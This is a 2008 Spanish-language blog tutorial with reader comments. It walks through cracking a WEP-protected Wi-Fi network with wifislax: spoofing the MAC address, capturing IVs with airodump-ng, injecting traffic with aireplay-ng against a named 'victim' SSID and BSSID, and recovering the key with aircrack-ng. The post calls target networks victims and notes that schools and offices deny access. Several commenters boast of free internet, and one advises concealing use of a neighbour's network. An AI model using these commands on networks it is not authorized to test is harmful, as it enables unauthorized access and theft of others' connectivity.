« GUIA PARA SER FAMOSO 1 | Inicio | De lo que sea »
Auditorias wireless (hackeo)
Por arkanuz | October 22, 2008
Lamento haberme ausentado tanto tiempo pues tuve varias cosas que hacer, sin embargo me alegra que el equipo siga manteniendo el nombre de la página en alto y hallan publicado a pesar de que no los este arreando. Por cierto tenemos nuevos miembros muy talentosos, etc, etc. Ahora a lo que nos truje (importa).
Nuestras herramientas serán:
- cd wifislax.
- tarjeta de red inalambrica (y obvio que la compu).
- una cafetera (porque vamos a tardar mucho tiempo y hay que mantenernos despiertos, no porque la vayamos a usar realmente).
Primero necesitamos descagar wifislax 3.1 (la ultima versión hasta el momento de escribir este post), para lo cual pincha aquí .
Entonces se tedescargará una imagen iso del cd (700MB aprox así que usa un gestor de descarga). Si eres de esas personas que no tienen tiempo para hecharlo a perder entonces bajate la versión ligera pinchando aquí (son 250MB). Recomiendo la versión completa por eso de los drivers.
Una vez descargado el iso puedes quemarlo con NERO, K3B o lo que uses para quemar discos (claro que a excepsion del quemador de windows por motivos obvios… bueno, sino no te son obvios puedes preguntar).
Ahora debes arrancar tu compu desde el cd. En algunas arranca automaticamente, en otras necesitas presionar F12 o alguna otra tecla para que te salga la opción. Entonces te saldrá una pantalla como esta:
Le das “enter” a todo lo que salga hasta que te pidan usuario y contraseña. Si lees las instrucciones de la pantalla veras que los datos son:
user: root
pass: toor
Una vez que entres en modo consola puedes configurar tu tarjeta de video con el siguiente comando
xconfig
En algunas ocasiones esto puede generar errores y la pantalla se puede ver oscura o la imagen puede quedar deformada. Si ese es tu caso olvida el paso anterior.
Ahora entraremos al modo gráfico.
startx
Entonces espera a que cargue el sistema y se verá una pantalla así:
Ahora viene la parte buena, buscar una victima. Para eso ve a los siguiente:
Inicio->Wifislax->Herramientas wireless->kismet
Te saldrá una pantalla como la siguiente:
Si tu red es atheros ocupa el driver “rt2500″, sino entonces prueba con alguno de los que aparece hasta obtener la pantalla anterior.
teclea “espacio” y dos veces “s”. Ahora selecciona sobre tu red victima y presiona enter.
Aquà debes copiar lo que salga en BSSID , SSID , CHANNEL y ENCRIPT .
Cierra la ventana para poder usar la tarjeta inalambrica (y todo lo que tengas abierto para no hacerte bolas con tantas ventanas) y abre una consola de mando (shell). Aqui vas a teclear lo siguiente
iwconfig
entoces saldra una descripción de tus tarjetas de red conectadas. Ubica cual es tu tarjeta de red inalambrica, en mi caso es “ath0″.
Ahora daremos de baja la tarjeta para cambiar la MAC de la misma, esto es por motivo de seguridad y para hacer los siguientes pasos mas faciles, aunque si quieres puedes saltar este paso.
ifconfig TUTARJETA down
macchanger -m 00:11:22:33:44:55 TUTARJETA
ifconfig TUTARJETA up
Listo, ahora la mac de tu compu es 00:11:22:33:44:55 y así no necesitas aprenderte la mac original de tu tarjeta. En mi caso, para el paso anterior yo tecleo:
ifconfig ath0 down
macchanger -m 00:11:22:33:44:55 ath0
ifconfig ath0 up
Bien, ahora pondremos tu tarjeta en modo monitor para que puedas empezar el ataque:
iwconfig TUTARJETA mode Monitor channel CANALDEATAQUE
en mi caso esto es
iwconfig ath0 mode Monitor channel 6
El canal que uso es el que copie arriba y el cual es el canal de ataque. Ahora vamos a filtrar los canales del escaneo de redes y a guardarlos en un archivo que llamaremos “red”.
airodump-ng –ivs -w red channel CANALQUECOPIASTE TUTARJETA
Así, el comando anterior yo lo escribo:
airodump-ng –ivs -w red channel 6 ath0
Con esto se despliegan las redes disponibles, su BSSID y el canal por el que operan, si te arrepientes puedes repetir el comando con el canal de la red que deseas hackear.
Es la hora de abrir una nueva consola y dejar la anterior abierta para verificar el tráfico de las redes (no vayas a cerra la consola anterior pues la necesitamos para verificar el tráfico). Ahora ocuparemos aireplay en su versión ng para abrir la red.
aireplay-ng -1 0 -e SSID -a BSSID -h 00:11:22:33:44:55 TUTARJETA
observa que 00:11:22:33:44:55 es la mac que cambiamos con macchanger, si saltaste ese paso introduce la mac original de tu compu. Debido a que yo si cambie la mac de mi compu este paso yo lo tecleo:
aireplay-ng -1 0 -e INFINITUM6369 -a 00:1B:5B:A8:5A:41 -h 00:11:22:33:44:55 ath0
Si despues de este comando te aparece una carita así: 
con un texto qe dice succefull o cosa por el estilo entonces puedes pasar al siguiente paso, en caso contrario sigue insistiendo pues algunas redes no jalan a la primera, otra cosa que puede ocasionar problemas es que tienes una intensidad de señal muy baja, entonces no vas a poder hackear la red.
Ahora a inyectar tráfico:
aireplay-ng -3 -b BSSID -h 00:11:22:33:44:55 TUTARJETA
para mi, esto es:
aireplay-ng -3 -b 00:1B:5B:A8:5A:41 -h 00:11:22:33:44:55 ath0
Si despues de esto se envia un diálogo de paquetes enviados y recibidos que corren rápidamente entonces ya la hiciste. La pantalla se debe ver así
No te desesperes, a veces tarda unos segundos, si no te aparece esta pantalla entonces necesitas mas poder de señal. En mi caso con una señal de 30% corre aunque a veces debes insistirle.
Ahora fijate en la consola que dejamos abierta para el tráfico, abajo de #Data debe de estas creciendo el número de la red que seleccionaste, estos se llaman ivs (desconosco que signifique pero se refieren a algo asÃí como los paquetes que estas leyendo). Cuando el número de paquetes de la red seleccionada llegue a 250,000 estarás listo para el siguiente paso.
Puedes parar el inyecto de tráfico presionando Ctrl+C y ocupar la misma ventana para teclear lo siguiente, sino abre una nueva consola y escribe:
ls
con esto se desplegaran los archivos que generaste con aireplay.
si te fijas yo solo generó un archivo (me salió a la primera) sin embargo a veces tienes tienes que hacer esto varias veces y se te generan más de un archivo “red” que se van numerando red-01.ivs, red-02.ivs, y asi sucesivamente.
Ahora viene la crackeada
airecrack-ng TUARCHIVORED.ivs
En mi ejemplo anterior queda
aircrack-ng red-01.ivs
Si tu te equivocaste varias veces entonces sustituye el nombre del archivo por el ultimo que tengas en la lista , por ejemplo si el ultimo archivo red que generaste es red-05.ivs el comando que debes escribir es airecrack red-05.ivs
Listo, ahora es solo custion de segundos y te aparecerá una pantalla como la que sigue:
Asà tu clave es la que sigue despues de Key Found:
Si eres usuario de windows, copia sin los dos puntos “:” y usala cuando el asistente de redes inalámbricas te pida la clave de la red víctima.
Si despues de unos segundos no te aparece key found entonces necesitaras juntar 800,000 ivs para que aircrack funcione. No te preocupes, repite los pasos desde airodump de la misma forma que como lo habias hecho y solo junta los 550,000 ivs que te faltan (recuerda, ya tienes 250,000 ivs), despues con aircrack junta los archivos, por ejemplo:
aircrak-ng red-01.ivs red-02.ivs
Notas:
- En algunos tutoriales dicen que solo tardas unos minutos en juntar 250,000 ivs. En mi caso tardo alrededor de 40 minutos porque trabajo con intensidades de señales de 40% o 50% pero supongo que debe de aumentar la velocidad si la intensidad de señal es mas alta.
- Este tutorial no es para andar fregando a la gente (no se dejen llevar por el dark side), muchos pagamos nuestros servivios de manera honesta, sin embargo a veces es fastidioso que algunos lugares te niegan el acceso a red cuando es tu derecho (escuelas y oficinas). Puedes llegar a un acuerdo con tus vecinos y pagar juntos el acceso a internet, es muy barato y si son varios pueden contratar la máxima velocidad por un precio muy accesible.
- Hace un par de días encontrá una red que necesitó 400 000 iv’s para poder descencriptarse.
Cualquier duda o comentario pueden dejarlo en la página y se los contestaremos a la mayor brevedad posible.
Este tuto esta basado en los que encontré en las páginas:
http://sonicux.blogspot.com/2007/05/hackear-2wire-infinitum-romper-cadado.html
http://www.imgeek.net/?cat=8
21 perros que no vamos a patear por que haz comentado en “Auditorias wireless (hackeo)”
November 20th, 2008 el 10:15 pm
Que transa, oye tu pagina esta chida. Espero y dejes tutoriales sobre el uso de linux y pues algunos truquitos en linux para facilitarnos la vida como el graficar en linux y cosas asi padres, cuidate me sirvio este articulo…..Por que crees que te escribo ¡¡¡¡¡ya tengo internet!!!!! te presumo y gratis jajajajaja
saludos. por cierto tus emoticonos no sirven jajaja. aun no checo el ultimo detalle pero espero y funcione gracias.
November 21st, 2008 el 11:52 am
Ya están los emoticonos, gracias por el aviso.
January 23rd, 2009 el 3:24 am
hermano que chip utiliza tu tarjeta inalambrica? plase
tell more? o dime cual quier tarjeta inalambrica puede capturar paquetes?
January 24th, 2009 el 6:47 pm
Yo ocupo un chip atheros (el que viene con mi lap) y lo probé con la tarjeta broadcom de una HP. En hipótesis sirve con cualquier chip de tarjeta inalámbrica sin embargo el inconveniente viene con las tarjetas nuevas (de una año a la fecha).
Cualquier pregunta no dudes en hacernosla saber para ayudarte.
January 28th, 2009 el 11:06 am
Muy buen tutorial estimado Arkanuz, a poner en práctica lo aprendido, ja ja.
February 3rd, 2009 el 7:51 pm
dime que tarjeta me recomiendas para hacer esto en mi pc normal..grcaias
February 4th, 2009 el 8:48 pm
En mi opinión personal y compartida por varios usuarios de internet, las mejores tarjetas para el hackeo de redes son las atheros internas (pci) pues sus drivers están parchados en su mayoria. Si vas a comprar una tarjeta exclusiva para este propósito, las internas dicen no ofresen tanta bronca al cargar (no me consta, pues a la fecha no he probado con una usb, pero haber si en estos dÃas consigo una y les digo como me fúe).
Como antes habia mencionado, intenté hace un par de semanas “jugar” con la tarjeta broadcom de una lap dell nueva (noviembre 2008) y no encontre los driver’s parchados pero los buscare de nuevo en estos dÃas (en wifislax 3.1 no venian y en red tampoco están).
Tan pronto salga la siguiente versión de wifislax actualisaré el enlace
February 14th, 2009 el 10:04 am
me compre la TP-LINK TL-WN551G es buena para usar wifislax ..gracias
February 14th, 2009 el 7:56 pm
Es una buena compra la de tu tarjeta, claro que puedes usar wifislax con ella usando el driver de la atheros 5005g (es decir, en caso de que quieras usar kismet, usa el driver rt2500).
En general el chipset es el mismo que el de las atheros porlo que no tendrás broncas con los drivers.
Con respecto a la cobertura se puede decir que es de rango mediano porlo que talves no te llegue la señal con mucha potencia, pero se defiende.
No olvides dejarnos tus impresiones en el manejo de esta tarjeta ya que gracias a ellos es como podemos difundir información a los nuevos usuarios en auditorias wireles. Saludos
March 3rd, 2009 el 10:51 am
holas io tambn tengo la tarjeta SA-WN55IG ps es buena pra el Wifislax??
March 4th, 2009 el 11:26 am
Siento la tardanza pero estaba buscando tu tarjeta no la encuentro, aunque en teoria cualuier tarjeta de red es compatible con wifislax. Si quieres que te la investigue mejor, entonces puedes mandar tambien la marca de tu tarjeta para que asi la busque con el fabricante. Hasta luego.
May 14th, 2009 el 2:09 pm
hola ,me gustaria saber si alguien ha probado usar wifislax 3.1 con la targ. de red tp-lik tl-wn551g con placa madre pc-chip p23g ,si presenta problema de imcompatibilidad? graciassss
May 19th, 2009 el 11:11 pm
hola arkanus quiero saber si me es posible realizar el hackeo con el windows xp por que yo tambien tengo la tarjeta tp-link wn551g pero con el linux no domino nada por favor explicame un poco
May 20th, 2009 el 6:37 pm
yo he probado con la placa madre p13g+ y cuando va a ingresar al sistema de wifislax se me va el video pero el programa corre no se que hacer algunas sugerencias y soluciones
May 21st, 2009 el 1:46 pm
Antes del comando startx no uses el comando ‘xconfig’. A mi tambien me sale ese error, la bronca es que al tratar de configurar la salida de video… se desconfigura, jejeje. En caso de que no sea esto, pues si usa ‘xconfig’
May 21st, 2009 el 2:29 pm
hey,,,, es compatible con targetas madre pc-chip,,, esta targeta de red? por f…… por f…..
vaaavaaaaa ……………………………………
May 22nd, 2009 el 3:05 pm
Emm, la tarjeta madre no tiene que ver, sino el chip de la tarjeta inalámbrica. Wifislax es compatible con la mayoria de las tarjetas de red inalámbricas en el mercado (atheros es la mas recomendada, pero tambien están las broadcom, intel, etc.) Para mas informacion visiten: http://www.wifislax.com
May 22nd, 2009 el 4:57 pm
ok , muchas gracias.. voy a visitar la web de wifislax. saludos.
June 5th, 2009 el 11:20 pm
ola que tal oie disculpa , leei esta pagina . y mi pregunta es , realmente sirve la Tarjeta de Red Inalámbrica PCI Marca TP-Link Modelo TL-WN551G
para wififlax o backtrack asi, como para ponerla en modo monitor??, espero y me puedan ayudar ya que estoy pensando en comprarla y pues antes de comprar quisiera saber si en realidad me conviene?
March 12th, 2010 el 12:31 pm
hola , tngo esta tarjeta de red me compre la TP-LINK TL-WN551G , mi pregunta es si puedo desencriptar claves wep cn ella, yo uso windows XP , agradeceria mucho algunos consejos sobre q programas debo usar
April 6th, 2010 el 10:57 am
Hola, esta excelente tu manual felicidades funciona perfecto con una broadcom aunque tarde como 4 horas en una ocasion y como 10 minutos en otra, desafortunadamente no tengo muchas redes por aki, el punto seria mantenernos asi por mucho tiempo osea que no se den cuenta que estas usando el internet, como consejo usen windows vista y cuando se conecten a la red del vecino le pongan tipo de re publica para que no se den cuenta que estan colgados de ella, Gracias por el aporte